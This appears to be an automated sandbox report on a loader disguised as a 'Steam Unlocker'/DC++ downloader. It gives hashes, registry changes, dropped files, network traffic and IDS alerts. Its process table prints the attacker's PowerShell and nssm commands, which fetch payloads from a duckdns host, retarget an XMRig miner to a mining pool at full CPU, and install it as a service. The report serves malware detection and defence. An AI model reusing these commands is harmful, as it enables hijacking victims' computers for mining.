| File name: | 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe |
| Full analysis: | https://app.any.run/tasks/005ad5a9-3307-420d-9294-0283cf602018 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | April 11, 2024, 03:32:20 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows |
| MD5: | 3914808C61A192A5B6D27F8AB1960575 |
| SHA1: | C14AFF6A5DF721DCF39CF1616DD41F8A473AF213 |
| SHA256: | 62894D30AB5DCDC21984EC5B6770199662BF5A2932597D7DAF04963C6B8AA85B |
| SSDEEP: | 768:FzV6rEsGMvbpcs7ofrfnHJ5JSojNhY/J:xgrEsGmbpVofHHjNhYh |
| .exe | | | Generic Win/DOS Executable (50) |
|---|---|---|
| .exe | | | DOS Executable Generic (49.9) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2104:09:07 19:18:04+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 48 |
| CodeSize: | 702464 |
| InitializedDataSize: | 11264 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x0000 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 4.0.3.4859 |
| ProductVersionNumber: | 4.0.3.4859 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| Comments: | DC++ File Downloader |
| CompanyName: | DC++ |
| FileDescription: | DC++ File Downloader |
| FileVersion: | 4.0.3.4859 |
| InternalName: | Steam Unlocker.exe |
| LegalCopyright: | Copyright © 2024 |
| LegalTrademarks: | DC++ |
| OriginalFileName: | Steam Unlocker.exe |
| ProductName: | DC++ File Downloader |
| ProductVersion: | 4.0.3.4859 |
| AssemblyVersion: | 4.0.3.4859 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 240 | sc stop moneroocean_miner | C:\Windows\System32\sc.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Service Control Manager Configuration Tool Exit code: 1060 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 240 | "C:\Users\admin\Drivers\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\admin\Drivers" | C:\Users\admin\Drivers\nssm.exe | — | cmd.exe | |||||||||||
User: admin Company: Iain Patterson Integrity Level: HIGH Description: The NS service manager Exit code: 0 Version: 2.24-103-gf28f043 Modules
| |||||||||||||||
| 1136 | "C:\Users\admin\AppData\Local\Temp\62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe" | C:\Users\admin\AppData\Local\Temp\62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | ||||||||||||
User: admin Company: DC++ Integrity Level: HIGH Description: DC++ File Downloader Exit code: 0 Version: 4.0.3.4859 Modules
| |||||||||||||||
| 1432 | powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://github.com/ONLYOFFICE/nssm/releases/download/v2.24.1/nssm_x64.zip', 'C:\Users\admin\nssm.zip')" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1476 | powershell -Command "$out = cat 'C:\Users\admin\Drivers\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\admin\Drivers\config.json'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1536 | "C:\Users\admin\Drivers\xmrig.exe" | C:\Users\admin\Drivers\xmrig.exe | nssm.exe | ||||||||||||
User: SYSTEM Company: www.xmrig.com Integrity Level: SYSTEM Description: XMRig miner Version: 6.21.2-mo1 Modules
| |||||||||||||||
| 1696 | where powershell | C:\Windows\System32\where.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Where - Lists location of files Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1832 | powershell -Command "$out = cat 'C:\Users\admin\Drivers\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\admin\Drivers\config.json'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1988 | C:\WINDOWS\system32\net1 session | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2012 | C:\WINDOWS\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (3012) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3012) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3012) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3012) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (1136) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (1136) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (1136) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (1136) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (1136) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (1136) 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6000 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l32w3122.1lx.ps1 | text | |
MD5:— | SHA256:— | |||
| 6000 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j3tlgvom.gjf.psm1 | text | |
MD5:— | SHA256:— | |||
| 6000 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:— | SHA256:— | |||
| 1136 | 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\FILE.exe | executable | |
MD5:— | SHA256:— | |||
| 6284 | FILE.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\deliver.bat | text | |
MD5:— | SHA256:— | |||
| 6284 | FILE.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\start.vbs | text | |
MD5:— | SHA256:— | |||
| 4536 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nx12elhm.nai.ps1 | text | |
MD5:— | SHA256:— | |||
| 4536 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d3sbaxmb.b4w.psm1 | text | |
MD5:— | SHA256:— | |||
| 4536 | powershell.exe | C:\ProgramData\Drivers\7za.exe | executable | |
MD5:— | SHA256:— | |||
| 4168 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jyt5e2sn.y3t.ps1 | text | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
956 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
1136 | 62894d30ab5dcdc21984ec5b6770199662bf5a2932597d7daf04963c6b8aa85b.exe | GET | 200 | 200.165.100.3:30000 | http://adpk.duckdns.org:30000/9iblbtdj/Soup.exe | unknown | — | — | unknown |
4168 | powershell.exe | GET | 200 | 200.165.100.3:30000 | http://adpk.duckdns.org:30000/ohb8zbbp/Drivers.zip | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 2.17.169.134:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 2.17.169.134:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | — | — | unknown |
1996 | SIHClient.exe | GET | 200 | 2.17.169.134:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 2.17.169.134:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.3.crl | unknown | — | — | unknown |
1996 | SIHClient.exe | GET | 200 | 2.17.169.134:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 2.17.169.134:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 2.18.31.10:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4008 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | unknown |
3196 | svchost.exe | 40.113.110.67:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6552 | svchost.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
956 | svchost.exe | 20.190.159.75:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5152 | MoUsoCoreWorker.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
956 | svchost.exe | 40.126.31.73:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5152 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
956 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
adpk.duckdns.org |
| unknown |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
raw.githubusercontent.com |
| shared |
github.com |
| shared |
objects.githubusercontent.com |
| shared |
crl.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2136 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain |
2136 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.duckdns .org Domain |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4168 | powershell.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.duckdns .org Domain |
4168 | powershell.exe | Potentially Bad Traffic | ET HUNTING Terse Request for Zip File (GET) |
4168 | powershell.exe | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
4168 | powershell.exe | Attempted Administrator Privilege Gain | AV EXPLOIT Potential ZIP file exploiting CVE-2023-36413 |
4168 | powershell.exe | Potentially Bad Traffic | ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers |